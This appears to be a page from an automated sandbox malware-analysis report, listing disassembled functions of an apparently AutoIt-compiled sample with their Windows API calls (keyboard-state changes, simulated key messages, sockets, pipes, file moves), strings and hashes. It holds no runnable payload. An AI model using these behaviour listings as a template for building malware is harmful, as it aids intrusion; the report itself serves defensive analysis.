MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,006E17FB,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E16FB

Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E1777
__freea.LIBCMT ref: 006E17A2
__freea.LIBCMT ref: 006E17AE

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 0bd21dbb0cf52d9fe9ed0fea10904a6379a7212a2e1d18384357711c23731383
Instruction ID: 053613ba5cfd1afc2df840d98f663bdbc245760dc1cddd83b12b0a8d95f016c0
Opcode Fuzzy Hash: 0bd21dbb0cf52d9fe9ed0fea10904a6379a7212a2e1d18384357711c23731383
Instruction Fuzzy Hash: 3791C3B1E023969ADF208F66C851EEE7BB7AF46710F184659E801EF281D735CC41E760

Function 00724523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00724648
VariantInit.OLEAUT32(?), ref: 00724749
VariantClear.OLEAUT32(?), ref: 00724753
VariantClear.OLEAUT32(?), ref: 007247B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 007245D8, 00724706, 007247BE
Incorrect Object type in FOR..IN loop, xrefs: 0072472C

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: b01ef45335f6698c9e51ddb95e6dad7938018a1886d16bc44d6c5486a48ef26f
Instruction ID: 4cf698dd3b6620254701e5ce9f2517a139e1c297c23de639e96a39c7dc35b9e4
Opcode Fuzzy Hash: b01ef45335f6698c9e51ddb95e6dad7938018a1886d16bc44d6c5486a48ef26f
Instruction Fuzzy Hash: 6B918171A00229AFDF24CFA5DC44FAEBBB8EF46714F108559F515AB280D7789941CFA0

Function 00711187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0071125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00711284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007112A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007112D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0071135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007113C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00711430

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: e7b3062cc38f9832a865a7d9c032b0ce7d83b36216158a3da8a5abd08f2af648
Instruction ID: 20c32ee22c62c093d157fcdc517d76fdd788cc21333e279b8b39031b0eb59e6a
Opcode Fuzzy Hash: e7b3062cc38f9832a865a7d9c032b0ce7d83b36216158a3da8a5abd08f2af648
Instruction Fuzzy Hash: E991E271A00219AFDB00DF98D885BFEB7B5FF45721F508029EA11EB2D1D778A981CB94

Function 006B948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 060ccb2ee82987efa59744b60244de6ada397a5d839e018a3480cc62bb8cfb1f
Instruction ID: f1f73779abcdb90fa9237277cb0e0ef1bdf9e94e8bb647d57fe949b4803e9e43
Opcode Fuzzy Hash: 060ccb2ee82987efa59744b60244de6ada397a5d839e018a3480cc62bb8cfb1f
Instruction Fuzzy Hash: 5F913BB1D40219EFCB15CFA9CC84AEEBBB9FF49320F148059E615B7251D374A982CB60

Function 00723947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0072396B
CharUpperBuffW.USER32(?,?), ref: 00723A7A
_wcslen.LIBCMT ref: 00723A8A
VariantClear.OLEAUT32(?), ref: 00723C1F

Part of subcall function 00710CDF: VariantInit.OLEAUT32(00000000), ref: 00710D1F
Part of subcall function 00710CDF: VariantCopy.OLEAUT32(?,?), ref: 00710D28
Part of subcall function 00710CDF: VariantClear.OLEAUT32(?), ref: 00710D34

Strings

Incorrect Parameter format, xrefs: 007239A6, 00723BA1
AUTOIT.ERROR, xrefs: 00723A80, 00723A85

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 59299c971f64fadd903ab23bf4a5e6858043fc1c7f72e9230240a41144973157
Instruction ID: 4b3fc35fff0fc3c59555560437e6400fe5faa93f1c9d424c32ed5b72e1484e55
Opcode Fuzzy Hash: 59299c971f64fadd903ab23bf4a5e6858043fc1c7f72e9230240a41144973157
Instruction Fuzzy Hash: AD9166746083119FC704EF24D48096AB7E5FF89314F14892EF88A9B351DB38EE45CB92

Function 00724BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0070000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?,?,0070035E), ref: 0070002B
Part of subcall function 0070000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700046
Part of subcall function 0070000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700054
Part of subcall function 0070000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?), ref: 00700064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00724C51
_wcslen.LIBCMT ref: 00724D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00724DCF
CoTaskMemFree.OLE32(?), ref: 00724DDA

Strings

NULL Pointer assignment, xrefs: 00724E23, 00724E52

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 547f1041f73ce51a6fd18302c8df6aa5989133515f82d2ac5afc0fec8fde8ec7
Instruction ID: 2d972757bc61be8a74bc4331ec10abe0a83991ea254c3b8180d4324193865d4a
Opcode Fuzzy Hash: 547f1041f73ce51a6fd18302c8df6aa5989133515f82d2ac5afc0fec8fde8ec7
Instruction Fuzzy Hash: 2D910971D00229EFDF15DFA4D891AEEB7B9BF08310F10856AE915A7251DB385E44CFA0

Function 007320FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00732183
GetMenuItemCount.USER32(00000000), ref: 007321B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007321DD
_wcslen.LIBCMT ref: 00732213
GetMenuItemID.USER32(?,?), ref: 0073224D
GetSubMenu.USER32(?,?), ref: 0073225B

Part of subcall function 00703A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00703A57
Part of subcall function 00703A3D: GetCurrentThreadId.KERNEL32 ref: 00703A5E
Part of subcall function 00703A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007025B3), ref: 00703A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007322E3

Part of subcall function 0070E97B: Sleep.KERNEL32 ref: 0070E9F3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: a3329cdc2be7868389b741cd726009c1e7395cb6da454fd73198aa7247703885
Instruction ID: 48a4ffd9677a205a698f53098e47c5e565d72c94340dd1854a8564764a8b04ca
Opcode Fuzzy Hash: a3329cdc2be7868389b741cd726009c1e7395cb6da454fd73198aa7247703885
Instruction Fuzzy Hash: D7717E75A00215AFDB50EF64C845AAEB7F6FF48320F158459E816EB352DB38ED428B90

Function 0070AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0070AEF9
GetKeyboardState.USER32(?), ref: 0070AF0E
SetKeyboardState.USER32(?), ref: 0070AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0070AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0070AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0070AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0070B020

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 562dbea45ba3720b32106ed05d119fbb03117ef5bdc4d022f46278852cb80c52
Instruction ID: 5af64caa691d1c780f31e34b272149469f4f245caaf63240a0c6be01b7eabebf
Opcode Fuzzy Hash: 562dbea45ba3720b32106ed05d119fbb03117ef5bdc4d022f46278852cb80c52
Instruction Fuzzy Hash: 2051A2A0A047D6BDFB368334C84ABBA7EE95B06304F088689E1D9954C2D3DDE9C4D751

Function 0070ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0070AD19
GetKeyboardState.USER32(?), ref: 0070AD2E
SetKeyboardState.USER32(?), ref: 0070AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0070ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0070ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0070AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0070AE38

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: bbf24b6ab80b1705db1f14724aaeffbcd4678d2b9f969c13a15c6e35449f7dd4
Instruction ID: 345acf2d2f74b8651942f5a3dc7ab91e1c2cd0cc49bfa87746b1b1390eda0b59
Opcode Fuzzy Hash: bbf24b6ab80b1705db1f14724aaeffbcd4678d2b9f969c13a15c6e35449f7dd4
Instruction Fuzzy Hash: 4451F7A16047D5BDFB338334CC56B7A7ED86B46300F088689E1D5968C3D29CEC84D752

Function 006D542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(006E3CD6,?,?,?,?,?,?,?,?,006D5BA3,?,?,006E3CD6,?,?), ref: 006D5470
__fassign.LIBCMT ref: 006D54EB
__fassign.LIBCMT ref: 006D5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,006E3CD6,00000005,00000000,00000000), ref: 006D552C
WriteFile.KERNEL32(?,006E3CD6,00000000,006D5BA3,00000000,?,?,?,?,?,?,?,?,?,006D5BA3,?), ref: 006D554B
WriteFile.KERNEL32(?,?,00000001,006D5BA3,00000000,?,?,?,?,?,?,?,?,?,006D5BA3,?), ref: 006D5584

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1f1c9bb40a2e63211fbfca2685581d01184dfe4484dd49998e0e1bf380629c8d
Instruction ID: 759ec3d598dfe65c3ad4ded032a45f4138b2588563cd040cc8e747528efee185
Opcode Fuzzy Hash: 1f1c9bb40a2e63211fbfca2685581d01184dfe4484dd49998e0e1bf380629c8d
Instruction Fuzzy Hash: C651B3B0D006499FDB11CFA8D845AEEBBFAEF08300F14415BE556E7391D7309A41CB65

Function 007210B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0072304E: inet_addr.WSOCK32(?), ref: 0072307A
Part of subcall function 0072304E: _wcslen.LIBCMT ref: 0072309B

socket.WSOCK32(00000002,00000001,00000006), ref: 00721112
WSAGetLastError.WSOCK32 ref: 00721121
WSAGetLastError.WSOCK32 ref: 007211C9
closesocket.WSOCK32(00000000), ref: 007211F9

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 6ae594c1e3409d2b775c7461588f2d98b90439a5b099fb24fb77ec991209e64f
Instruction ID: 8adc47329c5d5c59a927bfc6424079651e1060218b62abe84e53a533798ca9e9
Opcode Fuzzy Hash: 6ae594c1e3409d2b775c7461588f2d98b90439a5b099fb24fb77ec991209e64f
Instruction Fuzzy Hash: 02410531600218AFEB109F24D884BAAB7EAFF45324F148059FD05AB291C778EE41CBE5

Function 0070CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0070CF22,?), ref: 0070DDFD

Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0070CF22,?), ref: 0070DE16

lstrcmpiW.KERNEL32(?,?), ref: 0070CF45
MoveFileW.KERNEL32(?,?), ref: 0070CF7F
_wcslen.LIBCMT ref: 0070D005
_wcslen.LIBCMT ref: 0070D01B
SHFileOperationW.SHELL32(?), ref: 0070D061

Strings

\*.*, xrefs: 0070CFF3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 8d526313c7a5c12f0b947688db0c93e41c12b11fc7c52503f9f2e49809e83fe0
Instruction ID: c13e68fd87053f4d8a7eaaa549f85896c476a52fc288dc65f71b8621323c325a
Opcode Fuzzy Hash: 8d526313c7a5c12f0b947688db0c93e41c12b11fc7c52503f9f2e49809e83fe0
Instruction Fuzzy Hash: C34167B2905219DEDF13EBA4C981EDE77F9AF08340F1001EAE505EB181EA38AA44CB55

Function 00732DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00732E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00732E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00732E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00732EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00732EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00732EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00732F0B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 8c6d17dc958f42e2cf9ebbc6e55f6a79d041fe3382acef8e9bf7f1e8905e551a
Instruction ID: 76db978d6e769c84067033f324c9ee14d6fbff4cbc8a2148b6f0e9aa67095b33
Opcode Fuzzy Hash: 8c6d17dc958f42e2cf9ebbc6e55f6a79d041fe3382acef8e9bf7f1e8905e551a
Instruction Fuzzy Hash: 99311731684150DFEB21CF18DC8AF6537E0EB4A751F1541A4FA049B2B3CB79A842DB45

Function 00707726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00707769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0070778F
SysAllocString.OLEAUT32(00000000), ref: 00707792
SysAllocString.OLEAUT32(?), ref: 007077B0
SysFreeString.OLEAUT32(?), ref: 007077B9
StringFromGUID2.OLE32(?,?,00000028), ref: 007077DE
SysAllocString.OLEAUT32(?), ref: 007077EC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 68a26d533bab1bff8f4cd6577f6e03dd343a1bd60c54ccc7193ff7618c678ccc
Instruction ID: a6928a013bee1aee457e16a0ed4330ed4b4b0f351dfada62be0ffc17531d0ad5
Opcode Fuzzy Hash: 68a26d533bab1bff8f4cd6577f6e03dd343a1bd60c54ccc7193ff7618c678ccc
Instruction Fuzzy Hash: 6621B076A04219AFEB14DFA8CC88CBB77ECEB093A47008125FA04DB1A0D678EC41C764

Function 007077FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00707842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00707868
SysAllocString.OLEAUT32(00000000), ref: 0070786B
SysAllocString.OLEAUT32 ref: 0070788C
SysFreeString.OLEAUT32 ref: 00707895
StringFromGUID2.OLE32(?,?,00000028), ref: 007078AF
SysAllocString.OLEAUT32(?), ref: 007078BD

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 46a0f29d68d2544c57898cc99bc9da9a3046b4f9d46c5d82bf6f7e3d48bc021a
Instruction ID: 7cd648e3d8cf3b33a522bfb6e4e216e582d084012d02953b53b93b2bcc2e807a
Opcode Fuzzy Hash: 46a0f29d68d2544c57898cc99bc9da9a3046b4f9d46c5d82bf6f7e3d48bc021a
Instruction Fuzzy Hash: 04216272A04214EFEB149FA8DC88DAA77ECEB09760710C125F915DB2E1D678EC41CB68

Function 007104D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007104F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0071052E

Strings

nul, xrefs: 00710567

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
